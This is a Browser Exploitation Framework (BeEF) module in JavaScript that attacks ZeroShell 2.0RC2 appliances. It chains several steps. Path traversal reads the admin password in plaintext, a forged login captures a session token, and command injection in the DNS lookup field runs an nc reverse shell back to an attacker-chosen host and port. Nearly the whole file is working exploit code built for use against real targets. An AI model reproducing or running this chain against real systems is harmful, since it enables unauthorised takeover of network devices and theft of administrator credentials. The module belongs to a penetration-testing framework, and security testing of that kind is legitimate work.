//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
	var rhost = '<%= @rhost %>';
	var rport = '<%= @rport %>';
	var lhost = '<%= @lhost %>';
	var lport = '<%= @lport %>';

	var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
	var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";

	var pwd = "";
	var token = "";
	var payload = 'beef" localhost && rm -f /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' > /tmp/x #';

	beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to retrieve admin password in plaintext: " + uripwd);
	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
		if(response1.status_code == 200){
			pwd = response1.response_body.trim();
			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
			beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
				if(response2.status_code == 200){
					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
					beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to spawn a reverse-shell via CSRF in ZeroShell SOP context.");
					beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { 
						Action: "Lookup",
						Section: "DNS",
						DNS: "localhost",
						STk: token,
						What: payload
						}, 10, 'script', false, null, function(response3){
							beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
						}
					);
				} else {
					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
				}
			});
		} else {
			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
		}
	});
});

